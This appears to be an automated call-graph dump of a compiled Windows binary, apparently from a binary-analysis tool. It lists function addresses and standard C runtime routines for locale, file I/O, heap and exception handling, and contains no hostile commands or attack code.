20095 11ce24 20098 118244 __dosmaperr 14 API calls 20095->20098 20112 11ce0e 20095->20112 20100 11ce32 20098->20100 20099 116eff ___free_lconv_mon 14 API calls 20099->20086 20104 116eff ___free_lconv_mon 14 API calls 20100->20104 20101 11ce00 20105 11ce09 20101->20105 20106 11ce1d 20101->20106 20102 11cee2 20102->20112 20113 11c9e7 32 API calls 20102->20113 20103 11ce97 20108 116eff ___free_lconv_mon 14 API calls 20103->20108 20109 11ce3d 20104->20109 20110 111b24 __dosmaperr 14 API calls 20105->20110 20107 11cffa 39 API calls 20106->20107 20111 11ce22 20107->20111 20117 11ce9f 20108->20117 20109->20111 20109->20112 20115 118244 __dosmaperr 14 API calls 20109->20115 20110->20112 20111->20112 20149 11d014 20111->20149 20112->20099 20114 11cf10 20113->20114 20116 116eff ___free_lconv_mon 14 API calls 20114->20116 20119 11ce59 20115->20119 20122 11cecc 20116->20122 20117->20122 20153 11c9e7 20117->20153 20118 11cfca 20120 116eff ___free_lconv_mon 14 API calls 20118->20120 20123 116eff ___free_lconv_mon 14 API calls 20119->20123 20120->20086 20122->20112 20122->20118 20122->20122 20125 118244 __dosmaperr 14 API calls 20122->20125 20123->20111 20124 11cec3 20126 116eff ___free_lconv_mon 14 API calls 20124->20126 20127 11cf5b 20125->20127 20126->20122 20128 11cf63 20127->20128 20129 11cf6b 20127->20129 20130 116eff ___free_lconv_mon 14 API calls 20128->20130 20131 11584c ___std_exception_copy 29 API calls 20129->20131 20130->20112 20132 11cf77 20131->20132 20133 11cfef 20132->20133 20134 11cf7e 20132->20134 20135 112276 __Getctype 11 API calls 20133->20135 20162 1227ac 20134->20162 20137 11cff9 20135->20137 20146 11cde9 20145->20146 20147 11d007 20145->20147 20146->20095 20146->20101 20146->20111 20177 11d069 20147->20177 20150 11ce87 20149->20150 20152 11d02a 20149->20152 20150->20102 20150->20103 20152->20150 20192 1226bb 20152->20192 20154 11c9f4 20153->20154 20155 11ca0f 20153->20155 20154->20155 20156 11ca00 20154->20156 20157 11ca1e 20155->20157 20292 122554 20155->20292 20159 111b24 __dosmaperr 14 API calls 20156->20159 20299 120239 20157->20299 20161 11ca05 __fread_nolock 20159->20161 20161->20124 20311 118205 20162->20311 20178 11d077 20177->20178 20179 11d07c 20177->20179 20178->20146 20180 118244 __dosmaperr 14 API calls 20179->20180 20181 11d099 20180->20181 20182 11d107 20181->20182 20185 11d10c 20181->20185 20188 118244 __dosmaperr 14 API calls 20181->20188 20189 116eff ___free_lconv_mon 14 API calls 20181->20189 20190 11584c ___std_exception_copy 29 API calls 20181->20190 20191 11d0f6 20181->20191 20183 1128bf CallUnexpected 39 API calls 20182->20183 20183->20185 20184 116eff ___free_lconv_mon 14 API calls 20184->20178 20186 112276 __Getctype 11 API calls 20185->20186 20187 11d118 20186->20187 20188->20181 20189->20181 20190->20181 20191->20184 20193 1226c9 20192->20193 20194 1226cf 20192->20194 20197 122882 20193->20197 20198 1228ca 20193->20198 20210 1226e4 20194->20210 20200 122888 20197->20200 20203 1228a5 20197->20203 20230 1228e0 20198->20230 20202 111b24 __dosmaperr 14 API calls 20200->20202 20201 122898 20201->20152 20204 12288d 20202->20204 20205 111b24 __dosmaperr 14 API calls 20203->20205 20209 1228c3 20203->20209 20206 112249 ___std_exception_copy 29 API calls 20204->20206 20207 1228b4 20205->20207 20206->20201 20208 112249 ___std_exception_copy 29 API calls 20207->20208 20208->20201 20209->20152 20211 10eb79 __strnicoll 39 API calls 20210->20211 20212 1226fa 20211->20212 20213 122716 20212->20213 20214 12272d 20212->20214 20227 1226df 20212->20227 20215 111b24 __dosmaperr 14 API calls 20213->20215 20216 122736 20214->20216 20217 122748 20214->20217 20218 12271b 20215->20218 20220 111b24 __dosmaperr 14 API calls 20216->20220 20221 122755 20217->20221 20222 122768 20217->20222 20219 112249 ___std_exception_copy 29 API calls 20218->20219 20219->20227 20223 12273b 20220->20223 20224 1228e0 __strnicoll 39 API calls 20221->20224 20248 123ad4 20222->20248 20226 112249 ___std_exception_copy 29 API calls 20223->20226 20224->20227 20226->20227 20227->20152 20229 111b24 __dosmaperr 14 API calls 20229->20227 20231 1228f0 20230->20231 20232 12290a 20230->20232 20233 111b24 __dosmaperr 14 API calls 20231->20233 20234 122912 20232->20234 20235 122929 20232->20235 20239 1228f5 20233->20239 20236 111b24 __dosmaperr 14 API calls 20234->20236 20237 122935 20235->20237 20238 12294c 20235->20238 20240 122917 20236->20240 20241 111b24 __dosmaperr 14 API calls 20237->20241 20245 10eb79 __strnicoll 39 API calls 20238->20245 20247 122900 20238->20247 20242 112249 ___std_exception_copy 29 API calls 20239->20242 20243 112249 ___std_exception_copy 29 API calls 20240->20243 20244 12293a 20241->20244 20242->20247 20243->20247 20246 112249 ___std_exception_copy 29 API calls 20244->20246 20245->20247 20246->20247 20247->20201 20249 10eb79 __strnicoll 39 API calls 20248->20249 20250 123ae7 20249->20250 20253 123b1a 20250->20253 20256 123b4e __strnicoll 20253->20256 20254 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20255 12277e 20254->20255 20255->20227 20255->20229 20257 123bce 20256->20257 20258 123db2 20256->20258 20260 123bbb GetCPInfo 20256->20260 20261 123bd2 20256->20261 20259 116f87 __strnicoll MultiByteToWideChar 20257->20259 20257->20261 20262 123c54 20259->20262 20260->20257 20260->20261 20261->20254 20261->20258 20262->20261 20263 123c7b __alloca_probe_16 20262->20263 20265 116f39 __fread_nolock 15 API calls 20262->20265 20268 123da6 20262->20268 20266 116f87 __strnicoll MultiByteToWideChar 20263->20266 20263->20268 20264 10bcc3 __freea 14 API calls 20264->20261 20265->20263 20267 123cc7 20266->20267 20267->20268 20268->20264 20293 122574 HeapSize 20292->20293 20294 12255f 20292->20294 20293->20157 20295 111b24 __dosmaperr 14 API calls 20294->20295 20296 122564 20295->20296 20297 112249 ___std_exception_copy 29 API calls 20296->20297 20298 12256f 20297->20298 20298->20157 20300 120251 20299->20300 20301 120246 20299->20301 20303 120259 20300->20303 20310 120262 __dosmaperr 20300->20310 20302 116f39 __fread_nolock 15 API calls 20301->20302 20308 12024e 20302->20308 20304 116eff ___free_lconv_mon 14 API calls 20303->20304 20304->20308 20305 120267 20307 111b24 __dosmaperr 14 API calls 20305->20307 20306 12028c HeapReAlloc 20306->20308 20306->20310 20307->20308 20308->20161 20309 10fcb8 std::_Facet_Register 2 API calls 20309->20310 20310->20305 20310->20306 20310->20309 20312 10eb79 __strnicoll 39 API calls 20311->20312 20313 118217 20312->20313 20315 118229 20313->20315 20319 117a76 20313->20319 20316 10ec73 20315->20316 20325 10eccb 20316->20325 20322 117fe2 20319->20322 20323 117f5d std::_Lockit::_Lockit 5 API calls 20322->20323 20324 117a7e 20323->20324 20324->20315 20326 10ecf3 20325->20326 20327 10ecd9 20325->20327 20329 10ed19 20326->20329 20330 10ecfa 20326->20330 20343 10ec59 20327->20343 20365 ac9d0 20355->20365 20357 e91bd 20357->19589 20358 e573c 20372 b2e40 20358->20372 20359 adfe0 69 API calls 20363 e4a3a 20359->20363 20362 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20364 e9ed1 20362->20364 20363->20357 20363->20358 20363->20359 20364->19589 20367 acd45 20365->20367 20368 ad6e2 20367->20368 20369 ad30f 20367->20369 20379 b3f30 20367->20379 20368->20363 20370 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20369->20370 20371 adfd0 20370->20371 20371->20363 20373 b2e5b 20372->20373 20374 b3f1d 20373->20374 20376 e2f40 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20373->20376 20383 dde80 20373->20383 20375 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20374->20375 20377 b3f28 20375->20377 20376->20373 20377->20362 20380 b4560 20379->20380 20381 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20380->20381 20382 b47cf 20381->20382 20382->20367 20384 ddebb 20383->20384 20385 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20384->20385 20386 e2f29 20385->20386 20386->20373 20388 10fafe 20387->20388 20396 10fb0f 20387->20396 20389 10b5ef CallUnexpected GetModuleHandleW 20388->20389 20391 10fb03 20389->20391 20391->20396 20398 10fa05 GetModuleHandleExW 20391->20398 20393 10f9bd 20393->19567 20403 10fc6b 20396->20403 20399 10fa44 GetProcAddress 20398->20399 20400 10fa58 20398->20400 20399->20400 20401 10fa74 20400->20401 20402 10fa6b FreeLibrary 20400->20402 20401->20396 20402->20401 20404 10fc77 ___scrt_is_nonwritable_in_current_image 20403->20404 20418 112551 EnterCriticalSection 20404->20418 20406 10fc81 20419 10fb68 20406->20419 20408 10fc8e 20423 10fcac 20408->20423 20411 10faa0 20448 10fa87 20411->20448 20413 10faaa 20418->20406 20420 10fb74 ___scrt_is_nonwritable_in_current_image CallUnexpected 20419->20420 20421 10fbd8 CallUnexpected 20420->20421 20426 11183e 20420->20426 20421->20408 20447 112568 LeaveCriticalSection 20423->20447 20425 10fb47 20425->20393 20425->20411 20427 11184a __EH_prolog3 20426->20427 20430 111ac9 20427->20430 20429 111871 std::ios_base::_Init 20429->20421 20431 111ad5 ___scrt_is_nonwritable_in_current_image 20430->20431 20438 112551 EnterCriticalSection 20431->20438 20433 111ae3 20439 111994 20433->20439 20438->20433 20440 1119b3 20439->20440 20441 1119ab 20439->20441 20440->20441 20442 116eff ___free_lconv_mon 14 API calls 20440->20442 20443 111b18 20441->20443 20442->20441 20446 112568 LeaveCriticalSection 20443->20446 20445 111b01 20445->20429 20446->20445 20447->20425 20451 1199b5 20448->20451 20450 10fa8c CallUnexpected 20450->20413 20452 1199c4 CallUnexpected 20451->20452 20453 1199d1 20452->20453 20455 117e10 20452->20455 20453->20450 20456 117f5d std::_Lockit::_Lockit 5 API calls 20455->20456 20457 117e2c 20456->20457 20457->20453 20459 10f42d 20458->20459 20460 10f43f ___scrt_uninitialize_crt 20458->20460 20461 10f43b 20459->20461 20463 112ab6 20459->20463 20460->19605 20461->19605 20466 112be1 20463->20466 20469 112cba 20466->20469 20470 112cc6 ___scrt_is_nonwritable_in_current_image 20469->20470 20477 112551 EnterCriticalSection 20470->20477 20472 112d3c 20486 112d5a 20472->20486 20473 112cd0 ___scrt_uninitialize_crt 20473->20472 20478 112c2e 20473->20478 20477->20473 20479 112c3a ___scrt_is_nonwritable_in_current_image 20478->20479 20489 10f4f5 EnterCriticalSection 20479->20489 20481 112c7d 20501 112cae 20481->20501 20482 112c44 ___scrt_uninitialize_crt 20482->20481 20490 112abf 20482->20490 20582 112568 LeaveCriticalSection 20486->20582 20488 112abd 20488->20461 20489->20482 20491 112ad4 _Fputc 20490->20491 20492 112ae6 20491->20492 20493 112adb 20491->20493 20504 112b24 20492->20504 20494 112be1 ___scrt_uninitialize_crt 68 API calls 20493->20494 20498 112ae1 _Fputc 20494->20498 20497 119960 _Fputc 29 API calls 20498->20481 20581 10f509 LeaveCriticalSection 20501->20581 20503 112c9c 20503->20473 20505 112b3d 20504->20505 20506 112af0 20504->20506 20505->20506 20507 119960 _Fputc 29 API calls 20505->20507 20506->20497 20506->20498 20581->20503 20582->20488 21105 b1910 21106 b1df0 21105->21106 21107 b1e10 21106->21107 21111 10a770 21106->21111 21108 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21107->21108 21109 b2e28 21108->21109 21112 10a792 _Yarn 21111->21112 21114 10a77f 21111->21114 21112->21114 21115 113c5d 21112->21115 21114->21106 21116 113c70 _Fputc 21115->21116 21119 113e3e 21116->21119 21118 113c85 _Fputc 21118->21114 21120 113e74 21119->21120 21121 113e4c 21119->21121 21120->21118 21121->21120 21122 113e59 21121->21122 21123 113e7b 21121->21123 21124 1123f2 _Fputc 29 API calls 21122->21124 21127 113f01 21123->21127 21124->21120 21128 113f0d ___scrt_is_nonwritable_in_current_image 21127->21128 21135 10f4f5 EnterCriticalSection 21128->21135 21130 113f1b 21136 113eb5 21130->21136 21135->21130 21146 11961b 21136->21146 21143 113f50 21210 10f509 LeaveCriticalSection 21143->21210 21145 113eb3 21145->21118 21167 1196c6 21146->21167 21148 113ecd 21153 113c97 21148->21153 21149 11962c _Fputc 21149->21148 21150 116f39 __fread_nolock 15 API calls 21149->21150 21151 119685 21150->21151 21152 116eff ___free_lconv_mon 14 API calls 21151->21152 21152->21148 21156 113ca9 21153->21156 21158 113cd2 21153->21158 21154 113cb7 21155 1123f2 _Fputc 29 API calls 21154->21155 21155->21158 21156->21154 21156->21158 21162 113ced _Yarn 21156->21162 21163 119704 21158->21163 21159 112b24 ___scrt_uninitialize_crt 64 API calls 21159->21162 21160 119960 _Fputc 29 API calls 21160->21162 21161 11dc42 __wsopen_s 64 API calls 21161->21162 21162->21158 21162->21159 21162->21160 21162->21161 21174 11ea5b 21162->21174 21164 11970f 21163->21164 21166 113ef7 21163->21166 21165 112b24 ___scrt_uninitialize_crt 64 API calls 21164->21165 21164->21166 21165->21166 21166->21143 21168 1196d2 _Fputc 21167->21168 21169 1196fc 21168->21169 21170 119960 _Fputc 29 API calls 21168->21170 21169->21149 21171 1196ed 21170->21171 21172 12196f __fread_nolock 29 API calls 21171->21172 21173 1196f3 21172->21173 21173->21149 21175 11eaeb 21174->21175 21176 119960 _Fputc 29 API calls 21175->21176 21179 11eaf8 21176->21179 21177 11eb04 21177->21162 21178 11eb50 21178->21177 21181 11ebb2 21178->21181 21182 1196c6 _Fputc 29 API calls 21178->21182 21179->21177 21179->21178 21198 11ea66 21179->21198 21187 11ebe1 21181->21187 21184 11eba5 21182->21184 21184->21181 21186 1209c0 __fread_nolock 14 API calls 21184->21186 21186->21181 21188 119960 _Fputc 29 API calls 21187->21188 21189 11ebf0 21188->21189 21190 11ec03 21189->21190 21191 11ec96 21189->21191 21193 11ec20 21190->21193 21196 11ec47 21190->21196 21192 11dc42 __wsopen_s 64 API calls 21191->21192 21195 11ebc3 21192->21195 21194 11dc42 __wsopen_s 64 API calls 21193->21194 21194->21195 21195->21162 21196->21195 21206 11ca54 21196->21206 21199 11ea80 21198->21199 21200 11ea7c 21198->21200 21201 11d119 _Fputc 29 API calls 21199->21201 21205 11eacf 21199->21205 21200->21178 21202 11eaa1 21201->21202 21203 11eaa9 SetFilePointerEx 21202->21203 21202->21205 21204 11eac0 GetFileSizeEx 21203->21204 21203->21205 21204->21205 21205->21178 21207 11ca68 _Fputc 21206->21207 21208 11cb10 _Fputc 33 API calls 21207->21208 21209 11ca7d _Fputc 21208->21209 21209->21195 21210->21145 21219 11290e 21220 112921 _Fputc 21219->21220 21223 1129cc 21220->21223 21222 11292d _Fputc 21224 1129d8 ___scrt_is_nonwritable_in_current_image 21223->21224 21225 1129e2 21224->21225 21226 112a05 21224->21226 21227 1123f2 _Fputc 29 API calls 21225->21227 21233 1129fd 21226->21233 21234 10f4f5 EnterCriticalSection 21226->21234 21227->21233 21229 112a23 21235 11293e 21229->21235 21231 112a30 21249 112a5b 21231->21249 21233->21222 21234->21229 21236 11294b 21235->21236 21237 11296e 21235->21237 21238 1123f2 _Fputc 29 API calls 21236->21238 21239 112b24 ___scrt_uninitialize_crt 64 API calls 21237->21239 21247 112966 21237->21247 21238->21247 21240 112986 21239->21240 21252 1197ed 21240->21252 21243 119960 _Fputc 29 API calls 21244 11299a 21243->21244 21256 11d636 21244->21256 21247->21231 21248 116eff ___free_lconv_mon 14 API calls 21248->21247 21276 10f509 LeaveCriticalSection 21249->21276 21251 112a61 21251->21233 21253 119804 21252->21253 21254 11298e 21252->21254 21253->21254 21255 116eff ___free_lconv_mon 14 API calls 21253->21255 21254->21243 21255->21254 21257 1129a1 21256->21257 21258 11d65f 21256->21258 21257->21247 21257->21248 21259 11d6ae 21258->21259 21261 11d686 21258->21261 21260 1123f2 _Fputc 29 API calls 21259->21260 21260->21257 21263 11d6d9 21261->21263 21264 11d6e5 ___scrt_is_nonwritable_in_current_image 21263->21264 21271 11d507 EnterCriticalSection 21264->21271 21266 11d6f3 21267 11d724 21266->21267 21268 11d596 __wsopen_s 32 API calls 21266->21268 21272 11d75e 21267->21272 21268->21267 21271->21266 21275 11d52a LeaveCriticalSection 21272->21275 21274 11d747 21274->21257 21275->21274 21276->21251 21465 10ac30 21468 10a222 21465->21468 21467 10ac3b _Deallocate 21469 10a253 21468->21469 21471 10a265 21469->21471 21472 10a27f 21469->21472 21471->21467 21473 10a28b 21472->21473 21477 10a2a8 21472->21477 21478 10aae9 21473->21478 21477->21471 21481 10ab03 21478->21481 21483 10ab52 21478->21483 21479 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21480 10a297 21479->21480 21484 11290e 21480->21484 21482 113c5d 69 API calls 21481->21482 21481->21483 21482->21483 21483->21479 21485 112921 _Fputc 21484->21485 21486 1129cc 69 API calls 21485->21486 21487 11292d _Fputc 21486->21487 21487->21477 21556 10aa50 21559 10ae75 21556->21559 21558 10aa5e 21560 10ae81 __EH_prolog3 21559->21560 21577 10963d 21560->21577 21568 10aefc std::ios_base::_Init 21568->21558 21570 10aec5 21571 10af04 21570->21571 21572 10aecc 21570->21572 21612 f4660 21571->21612 21602 1096e1 21572->21602 21576 10aeb5 21605 10966e 21576->21605 21578 10964c 21577->21578 21581 109653 21577->21581 21615 11257f 21578->21615 21580 109651 21583 f06d0 21580->21583 21581->21580 21620 10ba08 EnterCriticalSection 21581->21620 21584 f0940 21583->21584 21585 f098c 21584->21585 21586 10966e std::_Lockit::~_Lockit 2 API calls 21584->21586 21587 10963d 7 API calls std::_Lockit::_Lockit 21584->21587 21588 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21585->21588 21586->21584 21587->21584 21589 f308d 21588->21589 21590 f30a0 21589->21590 21591 f30dc 21590->21591 21592 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21591->21592 21593 f328e 21592->21593 21593->21576 21594 10af0a 21593->21594 21596 10af16 __EH_prolog3 21594->21596 21595 10af69 std::ios_base::_Init 21595->21570 21596->21595 21669 10917c 21596->21669 21598 10af4b 21598->21595 21690 f6050 21598->21690 21599 10af2d codecvt 21599->21598 21680 109cdb 21599->21680 21603 10917c std::_Facet_Register 8 API calls 21602->21603 21604 1096ec 21603->21604 21604->21576 21606 109678 21605->21606 21607 11258d 21605->21607 21608 10968b 21606->21608 21889 10ba16 LeaveCriticalSection 21606->21889 21890 112568 LeaveCriticalSection 21607->21890 21608->21568 21611 112594 21611->21568 21613 10c2fc CallUnexpected RaiseException 21612->21613 21614 f4687 21613->21614 21621 117e5b 21615->21621 21620->21580 21622 117fe2 std::_Lockit::_Lockit 5 API calls 21621->21622 21623 117e60 21622->21623 21642 117ffc 21623->21642 21641 117e8d 21641->21641 21643 117f5d std::_Lockit::_Lockit 5 API calls 21642->21643 21644 117e65 21643->21644 21645 118016 21644->21645 21646 117f5d std::_Lockit::_Lockit 5 API calls 21645->21646 21647 117e6a 21646->21647 21648 118030 21647->21648 21649 117f5d std::_Lockit::_Lockit 5 API calls 21648->21649 21650 117e6f 21649->21650 21651 11804a 21650->21651 21652 117f5d std::_Lockit::_Lockit 5 API calls 21651->21652 21653 117e74 21652->21653 21654 118064 21653->21654 21655 117f5d std::_Lockit::_Lockit 5 API calls 21654->21655 21656 117e79 21655->21656 21657 11807e 21656->21657 21658 117f5d std::_Lockit::_Lockit 5 API calls 21657->21658 21659 117e7e 21658->21659 21660 118098 21659->21660 21661 117f5d std::_Lockit::_Lockit 5 API calls 21660->21661 21662 117e83 21661->21662 21663 1180b2 21662->21663 21664 117f5d std::_Lockit::_Lockit 5 API calls 21663->21664 21665 117e88 21664->21665 21666 1180cc 21665->21666 21667 117f5d std::_Lockit::_Lockit 5 API calls 21666->21667 21668 1180e2 21667->21668 21668->21641 21670 109181 ___std_exception_copy 21669->21670 21671 10919b 21670->21671 21672 10fcb8 std::_Facet_Register 2 API calls 21670->21672 21676 10919d std::_Facet_Register 21670->21676 21671->21599 21672->21670 21673 10b3cc 21674 92f00 std::_Facet_Register 5 API calls 21673->21674 21675 10b3db 21674->21675 21677 10c2fc CallUnexpected RaiseException 21675->21677 21676->21673 21679 10c2fc CallUnexpected RaiseException 21676->21679 21678 10b3e9 21677->21678 21679->21673 21681 109ce7 __EH_prolog3 21680->21681 21682 10963d std::_Lockit::_Lockit 7 API calls 21681->21682 21683 109cf4 21682->21683 21684 109d28 21683->21684 21685 109d3d 21683->21685 21699 109765 21684->21699 21708 109b61 21685->21708 21697 f6390 21690->21697 21691 1097b0 64 API calls std::_Locinfo::_Locinfo_dtor 21691->21697 21692 f7266 21693 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21692->21693 21694 fcac0 21693->21694 21694->21595 21695 108450 19 API calls codecvt 21695->21697 21696 106f90 19 API calls codecvt 21696->21697 21697->21691 21697->21692 21697->21695 21697->21696 21698 10966e LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 21697->21698 21698->21697 21715 11407f 21699->21715 21703 109789 21704 109799 21703->21704 21705 11407f std::_Locinfo::_Locinfo_ctor 64 API calls 21703->21705 21705->21704 21883 109c1b 21708->21883 21711 10c2fc CallUnexpected RaiseException 21712 109b80 21711->21712 21713 954c0 std::bad_exception::bad_exception 29 API calls 21712->21713 21714 109b9e 21713->21714 21716 117e5b std::_Lockit::_Lockit 5 API calls 21715->21716 21717 11408c 21716->21717 21724 1142b1 21717->21724 21720 1097ca 21721 1097d8 21720->21721 21723 1097e4 _Yarn ___std_exception_copy 21720->21723 21722 1134ed ___std_exception_copy 14 API calls 21721->21722 21721->21723 21722->21723 21723->21703 21723->21723 21725 1142bd ___scrt_is_nonwritable_in_current_image 21724->21725 21732 112551 EnterCriticalSection 21725->21732 21727 1142cb 21733 114152 21727->21733 21729 1142d8 21761 114300 21729->21761 21732->21727 21764 1140b7 21733->21764 21735 11416d 21736 11719a __Getctype 39 API calls 21735->21736 21757 1141b8 21735->21757 21737 11417a 21736->21737 21811 120582 21737->21811 21757->21729 21882 112568 LeaveCriticalSection 21761->21882 21763 109771 21763->21720 21765 1140d1 21764->21765 21766 1140c3 21764->21766 21831 1202a2 21765->21831 21816 10fe17 21766->21816 21769 1140cd 21769->21735 21770 1140e8 21771 114147 21770->21771 21772 118244 __dosmaperr 14 API calls 21770->21772 21773 112276 __Getctype 11 API calls 21771->21773 21774 114103 21772->21774 21775 114151 21773->21775 21776 11412b 21774->21776 21777 1202a2 std::_Locinfo::_Locinfo_ctor 41 API calls 21774->21777 21779 1140b7 std::_Locinfo::_Locinfo_ctor 64 API calls 21775->21779 21778 116eff ___free_lconv_mon 14 API calls 21776->21778 21780 11411a 21777->21780 21781 114140 21778->21781 21782 11416d 21779->21782 21783 114121 21780->21783 21784 11412d 21780->21784 21781->21735 21786 11719a __Getctype 39 API calls 21782->21786 21810 1141b8 21782->21810 21783->21771 21783->21776 21785 10fe17 std::_Locinfo::_Locinfo_ctor 60 API calls 21784->21785 21785->21776 21787 11417a 21786->21787 21788 120582 std::_Locinfo::_Locinfo_ctor 41 API calls 21787->21788 21810->21735 21812 120596 _Fputc 21811->21812 21849 120867 21812->21849 21817 10fe41 21816->21817 21818 10fe2d 21816->21818 21820 11719a __Getctype 39 API calls 21817->21820 21819 111b24 __dosmaperr 14 API calls 21818->21819 21821 10fe32 21819->21821 21822 10fe46 21820->21822 21823 112249 ___std_exception_copy 29 API calls 21821->21823 21824 117e5b std::_Lockit::_Lockit 5 API calls 21822->21824 21825 10fe3d 21823->21825 21826 10fe4e 21824->21826 21825->21769 21827 11aab5 __Getctype 39 API calls 21826->21827 21828 10fe53 21827->21828 21836 111433 21828->21836 21830 10fe95 21830->21769 21832 1202b5 _Fputc 21831->21832 21840 1204a6 21832->21840 21834 1202cd _Fputc 21834->21770 21837 11143f ___scrt_is_nonwritable_in_current_image 21836->21837 21838 110cf6 std::_Locinfo::_Locinfo_ctor 60 API calls 21837->21838 21839 11144b std::_Locinfo::_Locinfo_ctor 21838->21839 21839->21830 21841 1204b9 21840->21841 21842 1204e5 21841->21842 21843 1204bd 21841->21843 21845 120506 21842->21845 21846 1202df std::_Locinfo::_Locinfo_ctor 41 API calls 21842->21846 21844 1123f2 _Fputc 29 API calls 21843->21844 21848 1204db 21844->21848 21847 1123f2 _Fputc 29 API calls 21845->21847 21845->21848 21846->21845 21847->21848 21848->21834 21850 12087e 21849->21850 21851 1208a8 21850->21851 21853 120882 21850->21853 21852 1123f2 _Fputc 29 API calls 21851->21852 21857 1208c0 21852->21857 21856 1208a0 21853->21856 21858 1205c0 21853->21858 21855 1123f2 _Fputc 29 API calls 21855->21857 21856->21855 21856->21857 21859 1205f0 21858->21859 21882->21763 21886 109adf 21883->21886 21887 10c8ed ___std_exception_copy 29 API calls 21886->21887 21888 109b0b 21887->21888 21888->21711 21889->21608 21890->21611 22166 118e50 22169 112568 LeaveCriticalSection 22166->22169 22168 118e57 22169->22168 22206 117440 22207 11744b 22206->22207 22208 11745b 22206->22208 22212 117545 22207->22212 22211 116eff ___free_lconv_mon 14 API calls 22211->22208 22213 117560 22212->22213 22214 11755a 22212->22214 22216 116eff ___free_lconv_mon 14 API calls 22213->22216 22215 116eff ___free_lconv_mon 14 API calls 22214->22215 22215->22213 22217 11756c 22216->22217 22218 116eff ___free_lconv_mon 14 API calls 22217->22218 22219 117577 22218->22219 22220 116eff ___free_lconv_mon 14 API calls 22219->22220 22221 117582 22220->22221 22222 116eff ___free_lconv_mon 14 API calls 22221->22222 22223 11758d 22222->22223 22224 116eff ___free_lconv_mon 14 API calls 22223->22224 22225 117598 22224->22225 22226 116eff ___free_lconv_mon 14 API calls 22225->22226 22227 1175a3 22226->22227 22228 116eff ___free_lconv_mon 14 API calls 22227->22228 22229 1175ae 22228->22229 22230 116eff ___free_lconv_mon 14 API calls 22229->22230 22231 1175b9 22230->22231 22232 116eff ___free_lconv_mon 14 API calls 22231->22232 22233 1175c7 22232->22233 22238 1176be 22233->22238 22239 1176ca ___scrt_is_nonwritable_in_current_image 22238->22239 22254 112551 EnterCriticalSection 22239->22254 22241 1176fe 22255 11771d 22241->22255 22244 1176d4 22244->22241 22245 116eff ___free_lconv_mon 14 API calls 22244->22245 22245->22241 22246 117729 22247 117735 ___scrt_is_nonwritable_in_current_image 22246->22247 22259 112551 EnterCriticalSection 22247->22259 22249 11773f 22250 117461 __dosmaperr 14 API calls 22249->22250 22251 117752 22250->22251 22260 117772 22251->22260 22254->22244 22258 112568 LeaveCriticalSection 22255->22258 22257 1175ed 22257->22246 22258->22257 22259->22249 22263 112568 LeaveCriticalSection 22260->22263 22262 117453 22262->22211 22263->22262 20583 113543 20584 113556 _Fputc 20583->20584 20587 113b4e 20584->20587 20586 113562 _Fputc 20588 113b5a ___scrt_is_nonwritable_in_current_image 20587->20588 20589 113b61 20588->20589 20590 113b82 20588->20590 20591 1123f2 _Fputc 29 API calls 20589->20591 20598 10f4f5 EnterCriticalSection 20590->20598 20593 113b7a 20591->20593 20593->20586 20594 113b8d 20599 113b1c 20594->20599 20598->20594 20605 11397b 20599->20605 20601 113b2e 20602 113bc4 20601->20602 20657 10f509 LeaveCriticalSection 20602->20657 20604 113bcc 20604->20593 20606 1139b2 20605->20606 20607 11398a 20605->20607 20609 119960 _Fputc 29 API calls 20606->20609 20608 1123f2 _Fputc 29 API calls 20607->20608 20616 1139a5 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20608->20616 20610 1139bb 20609->20610 20619 11caf2 20610->20619 20613 113a65 20622 113605 20613->20622 20615 113a7c 20615->20616 20634 1137b0 20615->20634 20616->20601 20641 11cb10 20619->20641 20623 113614 __wsopen_s 20622->20623 20624 119960 _Fputc 29 API calls 20623->20624 20625 113630 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20624->20625 20627 11caf2 33 API calls 20625->20627 20633 11363c 20625->20633 20626 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20628 1137ae 20626->20628 20629 113690 20627->20629 20628->20616 20630 1136c2 ReadFile 20629->20630 20629->20633 20631 1136e9 20630->20631 20630->20633 20632 11caf2 33 API calls 20631->20632 20632->20633 20633->20626 20635 119960 _Fputc 29 API calls 20634->20635 20636 1137c3 20635->20636 20637 11caf2 33 API calls 20636->20637 20640 11380d __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20636->20640 20638 11386a 20637->20638 20639 11caf2 33 API calls 20638->20639 20638->20640 20639->20640 20640->20616 20642 11cb1c ___scrt_is_nonwritable_in_current_image 20641->20642 20643 11cb5f 20642->20643 20645 11cba5 20642->20645 20651 1139d9 20642->20651 20644 1123f2 _Fputc 29 API calls 20643->20644 20644->20651 20652 11d507 EnterCriticalSection 20645->20652 20647 11cbab 20648 11cbcc 20647->20648 20649 11cc35 __fread_nolock 31 API calls 20647->20649 20653 11cc2d 20648->20653 20649->20648 20651->20613 20651->20615 20651->20616 20652->20647 20656 11d52a LeaveCriticalSection 20653->20656 20655 11cc33 20655->20651 20656->20655 20657->20604 20760 112f76 20763 112f8d 20760->20763 20766 112f99 ___scrt_is_nonwritable_in_current_image 20763->20766 20764 112fa0 20765 111b24 __dosmaperr 14 API calls 20764->20765 20767 112fa5 20765->20767 20766->20764 20768 112fc0 20766->20768 20769 112249 ___std_exception_copy 29 API calls 20767->20769 20770 112fd2 20768->20770 20771 112fc5 20768->20771 20774 112f88 20769->20774 